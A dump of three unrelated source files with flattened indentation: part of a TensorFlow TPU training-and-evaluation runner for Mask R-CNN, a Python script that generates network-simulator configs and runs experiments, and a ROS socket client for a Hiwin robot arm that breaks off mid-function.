self.session_config.cluster_def.CopyFrom(cluster_spec.as_cluster_def())
self.tpu_init = tf.contrib.tpu.initialize_system()
self.tpu_shutdown = tf.contrib.tpu.shutdown_system()
self.master = self.tpu_cluster_resolver.get_master()
self.init_sess = tf.Session(self.master, config=self.session_config)
self.device_topology = self.init_sess.run(self.tpu_init)
self.input_partition_dims = input_partition_dims
self.use_spatial_partition = input_partition_dims is not None
self.num_cores_per_replica = num_cores_per_replica
if self.use_spatial_partition:
computation_shape = _NUM_CORES_TO_COMPUTATION_SHAPE[
self.num_cores_per_replica]
self.device_assignment = tpu_device_assignment.device_assignment(
topology=self.device_topology,
computation_shape=computation_shape,
num_replicas=self.num_shards)
tf.logging.info("num_cores_per_replica: %d", self.num_cores_per_replica)
tf.logging.info("computation_shape: %s", str(computation_shape))
tf.logging.info("num_replicas: %d", self.num_shards)
tf.logging.info("device_assignment.topology.device_coordinates: %s",
str(self.device_assignment.topology.device_coordinates))
tf.logging.info("device_assignment.core_assignment: %s",
str(self.device_assignment.core_assignment))
self.input_dims_flattener = runner_utils.InputDimsFlattener(
self.input_partition_dims)
eval_input_partition_dims = [dict(self.input_partition_dims[0]), None]
# don't need to partition the "is_padding" dimension
if eval_params["eval_samples"] % eval_params["eval_batch_size"] != 0:
eval_input_partition_dims[0][mask_rcnn_params.IS_PADDING] = None
self.eval_input_dims_flattener = runner_utils.InputDimsFlattener(
eval_input_partition_dims)
else:
self.device_assignment = None
self.input_dims_flattener = None
self.eval_input_dims_flattener = None
# Summary writer writes out train metrics.
self.summary_writer = tf.summary.FileWriter(self.model_dir)
# Summary writer writes out eval metrics.
eval_output_dir = os.path.join(self.model_dir, "eval")
tf.gfile.MakeDirs(eval_output_dir)
self.eval_summary_writer = tf.summary.FileWriter(eval_output_dir)
self.infeed_thread = None
self.total_epoch = self.train_params[
"total_steps"] // self.iterations_per_loop
def shutdown(self):
"""Shut down TrainLowLevelRunner."""
tf.logging.info("TrainLowLevelRunner: shutdown")
if self.infeed_thread:
self.infeed_thread.join()
if self.input_sess:
self.input_sess.close()
if self.train_eval_sess:
self.train_eval_sess.close()
self.summary_writer.close()
self.eval_summary_writer.close()
def _get_host(self, host_id):
if self.master in ("", "local"):
return "/replica:0/task:0"
job_name = (
self.tpu_job_name or self.tpu_cluster_resolver.get_job_name() or
"tpu_worker")
return "/job:%s/task:%d" % (job_name, host_id)
def build_enqueue_ops(self, input_fn, params, num_hosts, host_id, iterations,
is_training=True):
"""Build enqueue ops."""
tf.logging.info("TrainLowLevelRunner: build_enqueue_ops for %d, train=%g",
host_id, is_training)
def get_enqueue_ops_fn(host_id):
"""Generate the enqueue ops graph function for training."""
# TODO(b/129084726): make dataset sharding also work for TPU Estimator.
params["dataset_num_shards"] = num_hosts
params["dataset_shard_id"] = host_id
with tf.device(runner_utils.device_for_host(self._get_host(host_id))):
dataset = input_fn(params)
iterator = dataset.make_initializable_iterator()
if is_training:
self.dataset_initializer.append(iterator.initializer)
else:
self.eval_dataset_initializer.append(iterator.initializer)
def enqueue_ops_fn():
"""Enqueue ops function for one host."""
per_host_sharded_inputs = []
control_deps = []
for _ in range(self.train_params["replicas_per_worker"]):
with tf.control_dependencies(control_deps):
features, labels = iterator.get_next()
if self.use_spatial_partition:
self.input_dims_flattener.validate_and_flatten_input_dims(
features, labels)
flattened_inputs = (
self.input_flattener.flatten_features_and_labels(
features, labels))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if self.use_spatial_partition:
flattened_input_dims = (
self.input_dims_flattener.flattened_input_dims)
# pylint: disable=protected-access
infeed = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=flattened_input_dims,
device_assignment=self.device_assignment)
self.infeed_queue.append(infeed)
return infeed.generate_enqueue_ops(per_host_sharded_inputs)
infeed = tf.contrib.tpu.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
self.infeed_queue.append(infeed)
return infeed.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=functools.partial(
runner_utils.tpu_ordinal_fn,
replicas_per_worker=self.train_params["replicas_per_worker"]))
return enqueue_ops_fn
def get_eval_enqueue_ops_fn(host_id):
"""Generate the enqueue ops graph function for eval."""
# TODO(b/129084726): make dataset sharding also work for TPU Estimator.
params["dataset_num_shards"] = num_hosts
params["dataset_shard_id"] = host_id
with tf.device(runner_utils.device_for_host(self._get_host(host_id))):
dataset = input_fn(params)
iterator = dataset.make_initializable_iterator()
self.eval_dataset_initializer.append(iterator.initializer)
def eval_enqueue_ops_fn():
"""Enqueue ops function for one host."""
per_host_sharded_inputs = []
control_deps = []
for _ in range(self.train_params["replicas_per_worker"]):
with tf.control_dependencies(control_deps):
features = iterator.get_next()
if self.use_spatial_partition:
self.eval_input_dims_flattener.validate_and_flatten_input_dims(
features, None)
flattened_inputs = (
self.eval_input_flattener.flatten_features_and_labels(
features, None))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if self.use_spatial_partition:
flattened_input_dims = (
self.eval_input_dims_flattener.flattened_input_dims)
# pylint: disable=protected-access
infeed = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=flattened_input_dims,
device_assignment=self.device_assignment)
self.eval_infeed_queue.append(infeed)
return infeed.generate_enqueue_ops(per_host_sharded_inputs)
infeed = tf.contrib.tpu.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
self.eval_infeed_queue.append(infeed)
return infeed.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=functools.partial(
runner_utils.tpu_ordinal_fn,
replicas_per_worker=self.train_params["replicas_per_worker"]))
return eval_enqueue_ops_fn
with self.input_graph.as_default():
enqueue_op = runner_utils.wrap_computation_in_while_loop(
get_enqueue_ops_fn(host_id)
if is_training else get_eval_enqueue_ops_fn(host_id),
n=iterations,
host_name=self._get_host(host_id))
if is_training:
self.enqueue_ops.append(enqueue_op)
else:
self.eval_enqueue_ops.append(enqueue_op)
def initialize(self, model_fn, input_fn, eval_input_fn):
"""Build graph and do initialization for training."""
tf.logging.info("TrainAndEvalLowLevelRunner: initialize method")
self.num_hosts = (
self.num_shards * self.num_cores_per_replica //
self.train_params["cores_per_worker"])
for i in range(self.num_hosts):
self.build_enqueue_ops(input_fn, self.train_params, self.num_hosts, i,
self.iterations_per_loop, True)
self.build_enqueue_ops(eval_input_fn, self.eval_params, self.num_hosts, i,
self.eval_steps, False)
def infeed_thread_fn():
"""Build and infeed session.run calls in a background thread."""
for cur_epoch in range(self.total_epoch):
tf.logging.info("Start to infeed train batches for epoch %d", cur_epoch)
self.input_sess.run([self.enqueue_ops])
tf.logging.info("Start to infeed eval batches for epoch %d", cur_epoch)
self.input_sess.run([self.eval_enqueue_ops])
tf.logging.info("infeed thread exited.")
def tpu_train_step(loss):
"""Generate the TPU graph."""
del loss
values = self.infeed_queue[0].generate_dequeue_op(tpu_device=0)
features, labels = self.input_flattener.unflatten_features_and_labels(
values)
estimator_spec = model_fn(features, labels, tf.estimator.ModeKeys.TRAIN,
self.train_params)
loss, train_op = estimator_spec.loss, estimator_spec.train_op
self.scaffold_fn = estimator_spec.scaffold_fn
with tf.control_dependencies([train_op]):
return tf.identity(loss)
@tpu_function.on_device_training_loop
def train_loop():
return tf.contrib.tpu.repeat(self.iterations_per_loop, tpu_train_step,
[_INITIAL_LOSS])
def tpu_eval_step():
"""Generate the TPU graph."""
values = self.eval_infeed_queue[0].generate_dequeue_op(tpu_device=0)
(features,
_) = self.eval_input_flattener.unflatten_features_and_labels(values)
estimator_spec = model_fn(features, None, tf.estimator.ModeKeys.PREDICT,
self.eval_params)
for k, v in six.iteritems(estimator_spec.predictions):
self.outfeed_names.append(k)
self.outfeed_tensors.append(v)
with tf.device(runner_utils.device_for_tpu_core(self._get_host(0))):
outfeed_enqueue_ops = tf.contrib.tpu.outfeed_enqueue_tuple(
self.outfeed_tensors)
with tf.control_dependencies([outfeed_enqueue_ops]):
return tf.no_op()
@tpu_function.on_device_training_loop
def eval_loop():
return tf.contrib.tpu.repeat(self.eval_steps, tpu_eval_step, [])
def train_eval_step():
with tf.control_dependencies(train_loop()):
return eval_loop()
@tpu_function.on_device_training_loop
def train_eval_loop():
return tf.contrib.tpu.repeat(
self.total_epoch if self.train_params["all_in_one_session"] else 1,
train_eval_step, [])
def create_dequeue_ops(host_id):
"""Create outfeed dequeue ops."""
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for v in self.outfeed_tensors:
dequeue_ops.append([])
tensor_dtypes.append(v.dtype)
tensor_shapes.append(v.shape)
for i in range(self.eval_params["replicas_per_worker"]):
with tf.device(runner_utils.device_for_host(self._get_host(host_id))):
if self.use_spatial_partition:
replica_id = self.device_assignment.lookup_replicas(host_id, 0)[i]
ordinal = self.device_assignment.tpu_ordinal(
replica=replica_id, logical_core=0)
else:
ordinal = i
outfeed_tensors = tf.contrib.tpu.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
for j in range(len(outfeed_tensors)):
dequeue_ops[j] = tf.concat(dequeue_ops[j], axis=0)
return dequeue_ops
with self.train_eval_graph.as_default():
(self.train_eval_compile_op,
self.train_eval_op) = tpu.split_compile_and_shard(
train_eval_loop,
inputs=[],
num_shards=self.train_params["num_shards"],
outputs_from_all_shards=False,
device_assignment=self.device_assignment
)
for i in range(self.num_hosts):
self.dequeue_ops.append({})
tf.logging.info(
"TrainAndEvalLowLevelRunner: get dequeue ops for host:%d", i)
host_dequeue_ops = create_dequeue_ops(i)
for j, dequeue_tenor in enumerate(host_dequeue_ops):
self.dequeue_ops[i][self.outfeed_names[j]] = dequeue_tenor
if self.scaffold_fn:
self.scaffold_fn()
global_initializer = tf.global_variables_initializer()
local_initializer = tf.local_variables_initializer()
graph_io.write_graph(
self.train_eval_graph.as_graph_def(add_shapes=True), self.model_dir,
"graph.pbtxt")
self.saver = tf.train.Saver()
# Build tpu train model session and initialize graph
self.train_eval_sess = tf.Session(
self.master,
graph=self.train_eval_graph,
config=self.session_config)
self.train_eval_sess.run(global_initializer)
self.train_eval_sess.run(local_initializer)
# Compiles the train program.
self.train_eval_sess.run([self.train_eval_compile_op])
# Complete infeed graph generation and session.run calls
self.input_sess = tf.Session(
self.master,
graph=self.input_graph,
config=self.session_config)
self.input_sess.run(self.dataset_initializer)
self.input_sess.run(self.eval_dataset_initializer)
self.infeed_thread = threading.Thread(target=infeed_thread_fn)
# Starts the clock.
mlp_log.mlperf_print(key="init_stop", value=None)
mlp_log.mlperf_print(key="run_start", value=None)
self.infeed_thread.start()
def write_summary(self, summary_writer, graph, global_step,
elapsed_time, elapsed_steps, trained_examples):
"""Write a per-epoch summary of loss, epoch time, etc."""
with graph.as_default():
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = trained_examples / elapsed_time
if summary_writer is not None:
global_step_summary = tf.Summary(value=[
tf.Summary.Value(
tag="global_step/sec", simple_value=global_step_per_sec)
])
example_summary = tf.Summary(value=[
tf.Summary.Value(
tag="examples/sec", simple_value=examples_per_sec)
])
summary_writer.add_summary(global_step_summary, global_step)
summary_writer.add_summary(example_summary, global_step)
tf.logging.info("step = %d (%.3f sec)", global_step, elapsed_time)
tf.logging.info("global_step/sec: %g", global_step_per_sec)
tf.logging.info("examples/sec: %g", examples_per_sec)
def write_eval_summary(self, summary_writer, eval_results, current_step):
"""Write out eval results for the checkpoint."""
with tf.Graph().as_default():
summaries = []
for metric in eval_results:
summaries.append(
tf.Summary.Value(
tag=metric, simple_value=eval_results[metric]))
tf_summary = tf.Summary(value=list(summaries))
summary_writer.add_summary(tf_summary, current_step)
def get_predict_results(self, cur_epoch):
"""Run the predict loop on the TPU device."""
for step in range(self.eval_steps):
tf.logging.info(
"TrainAndEvalLowLevelRunner: reading eval step %d results", step)
predictions = {name: [] for name in self.outfeed_names}
for outfeed_dict in self.train_eval_sess.run(self.dequeue_ops):
for name, tensors in six.iteritems(outfeed_dict):
predictions[name].extend(tensors)
if step == self.eval_steps - 1:
# all predictions is read from device, async eval post-process starts.
# next train on device also starts.
mlp_log.mlperf_print(
"block_stop", None, metadata={"first_epoch_num": cur_epoch,
"epoch_count": 1})
mlp_log.mlperf_print(
"eval_start", None, metadata={"epoch_num": cur_epoch})
tf.logging.info("TrainAndEvalLowLevelRunner: start eval epoch %d.",
cur_epoch)
mlp_log.mlperf_print(
"block_start", None, metadata={"first_epoch_num": cur_epoch + 1,
"epoch_count": 1})
yield predictions
def train_and_eval(self):
"""Performs distributed model eval and writes a summary to directory."""
self.run_success = False
self.continue_train = True
# queues for predictions post-processing.
def post_processing_thread_fn():
"""Run post-processing on CPU for predictions."""
mlp_log.mlperf_print(
"block_start", None, metadata={"first_epoch_num": 0,
"epoch_count": 1})
for cur_epoch in range(self.total_epoch):
eval_begin = time.time()
# Enables multi-processing to accelerate post-processing.
eval_multiprocess.eval_multiprocessing(
self.eval_steps, self.get_predict_results(cur_epoch),
self.eval_metric, self.eval_params["eval_worker_count"])
pred_end = time.time()
tf.logging.info("prediction takes %d seconds.", pred_end - eval_begin)
num_eval_samples, eval_results = self.eval_metric.evaluate()
eval_end = time.time()
tf.logging.info("COCO evaluates %d samples", num_eval_samples)
if num_eval_samples != self.eval_params["eval_samples"]:
tf.logging.info("COCO fails to evaluate all %d samples, exit!" %
self.eval_params["eval_samples"])
self.run_success = False
self.continue_train = False
return
tf.logging.info("one evaluation takes %d seconds",
eval_end - eval_begin)
self.write_eval_summary(self.eval_summary_writer, eval_results,
cur_epoch * self.iterations_per_loop)
tf.logging.info("AP: %s" % eval_results["AP"])
tf.logging.info("mask_AP: %s" % eval_results["mask_AP"])
# Eval epoch is 0-indexed (for MLPerf log parsing).
mlp_log.mlperf_print(
"eval_stop", None, metadata={"epoch_num": cur_epoch})
# TODO(b/127959551): use both metrics once the bug is resolved.
mlp_log.mlperf_print(
"eval_accuracy", (float(eval_results["AP"]),
float(eval_results["mask_AP"])),
metadata={"epoch_num": cur_epoch})
if (eval_results["AP"] >= mask_rcnn_params.BOX_EVAL_TARGET and
eval_results["mask_AP"] >= mask_rcnn_params.MASK_EVAL_TARGET):
mlp_log.mlperf_print("run_stop", None, metadata={"status": "success"})
self.run_success = True
self.continue_train = False
return
# Run predict post processing thread on the background.
post_processing_thread = threading.Thread(target=post_processing_thread_fn)
post_processing_thread.start()
if self.train_params["all_in_one_session"]:
tf.logging.info("TrainAndEvalLowLevelRunner: start train_eval sessions")
self.train_eval_sess.run(self.train_eval_op)
else:
if self.train_params["train_and_eval_save_checkpoint"]:
ckpt_saver = runner_utils.AsyncCheckpointSaver(
_MAX_NUM_CHECKPOINT_THREADS, self.saver, self.model_dir,
self.train_eval_sess)
cur_epoch = 0
while cur_epoch < self.total_epoch and self.continue_train:
tf.logging.info("TrainAndEvalLowLevelRunner: start train epoch: %d",
cur_epoch)
start = time.time()
self.train_eval_sess.run(self.train_eval_op)
end = time.time()
self.write_summary(
summary_writer=self.summary_writer,
graph=self.train_eval_graph,
global_step=cur_epoch * self.iterations_per_loop,
elapsed_time=end - start,
elapsed_steps=self.iterations_per_loop,
trained_examples=self.train_params["num_examples_per_epoch"])
if self.train_params["train_and_eval_save_checkpoint"]:
ckpt_saver.checkpoint(cur_epoch * self.iterations_per_loop)
if self.run_success or not self.continue_train:
break
cur_epoch += 1
post_processing_thread.join()
if not self.run_success:
mlp_log.mlperf_print("run_stop", None, metadata={"status": "abort"})
|
run_experiments.py
|
#!/usr/bin/python
import subprocess
import threading
import multiprocessing
import os
''' backup of an old config
conf_str_incast32 =
init_cwnd: 12
max_cwnd: 15
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 33
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 1
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 0
disable_veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: 1
use_random_jitter: 1
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_incast2 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 2
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 1
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 0
disable_veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 1
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_incast32 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 33
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 1
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 0
disable_veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 1
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_incast143 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 144
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 0
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 0
disable_veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 1
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_all_to_all33 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 33
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 1
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 1
disable_veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 1
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_all_to_all144 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 144
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 0
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 1
disable_veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 1
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
#qos_ratio = ['10,90', '20,80', '30,70', '40,60', '50,50', '60,40', '70,30', '80,20', '90,10']
qos_ratio = ['50,50']
#runs = ['incast32', 'all_to_all33', 'incast143', 'all_to_all144'] # no need to run incast in the 144 node
#runs = ['incast32', 'all_to_all33']
runs = ['incast2']
#runs = ['all_to_all144']
#burst_size = [1]
burst_size = [1,2,4,8,16,32,64,128,256,512]
#burst_size = [1000,2000,3000,4000,5000,6000,7000,8000,9000,10000]
## create the "./config" and "./result" by yourself :(
binary = 'coresim/simulator'
template = binary + ' 1 ./exp_config/conf_{0}_{1}_{2}_B{3}_{4}.txt > ./result/result_{0}_{1}_{2}_B{3}_{4}.txt'
cdf_temp = './CDF_{}.txt'
#cdf_RPC = ['uniform_4K', 'uniform_32K']
cdf_RPC = ['write_req']
def getNumLines(trace):
out = subprocess.check_output('wc -l {}'.format(trace), shell=True)
return int(out.split()[0])
def run_exp(str, semaphore):
semaphore.acquire()
print template.format(*str)
subprocess.call(template.format(*str), shell=True)
semaphore.release()
threads = []
semaphore = threading.Semaphore(multiprocessing.cpu_count())
#semaphore = threading.Semaphore(multiprocessing.cpu_count() / 2) # save my poor laptop
for r in runs:
for cdf in cdf_RPC:
for ratio in qos_ratio:
for burst in burst_size:
num_flow = 1000000
#num_flow = 5000000 # use a larger number for all_to_all144
random_flow_start = 0 # 1: means exponential randomness in flow start time
# generate conf file
if r == 'incast32':
conf_str = conf_str_incast32.format(num_flow, cdf, ratio, burst, random_flow_start)
elif r == 'incast2':
conf_str = conf_str_incast2.format(num_flow, cdf, ratio, burst, random_flow_start)
elif r == 'all_to_all33':
conf_str = conf_str_all_to_all33.format(num_flow, cdf, ratio, burst, random_flow_start)
elif r == 'incast143':
conf_str = conf_str_incast143.format(num_flow, cdf, ratio, burst, random_flow_start)
elif r == 'all_to_all144':
conf_str = conf_str_all_to_all144.format(num_flow, cdf, ratio, burst, random_flow_start)
else:
assert False, r
# Note modify the config dir name
isrand = 'norand'
if (random_flow_start):
isrand = 'rand'
confFile = "./exp_config/conf_{0}_{1}_{2}_B{3}_{4}.txt".format(r, cdf, ratio.replace(',', '_'), burst, isrand)
with open(confFile, 'w') as f:
#print confFile
f.write(conf_str)
threads.append(threading.Thread(target=run_exp, args=((r, cdf, ratio.replace(',', '_'), burst, isrand), semaphore)))
print '\n'
[t.start() for t in threads]
[t.join() for t in threads]
print 'finished', len(threads), 'experiments'
|
Hiwin_RT605_ArmCommand_Socket_20190627195102.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
#self.get_connect()
pass
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
self.s.send(msg.encode('utf-8')) #用utf-8來encode,還有其他encode的方法,str用utf-8就OK!
def get_recieve(self):
data = self.s.recv(1024) #1024指定buffer的大小,限制一次收多少
data.decode('utf-8')
return data
def close(self):
self.s.close()
#Socket = client()
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
#Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
socket_cmd.Speedmode = speedmode
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command(s):
global arm_mode_flag,data
# if arm_mode_flag == True:
# arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
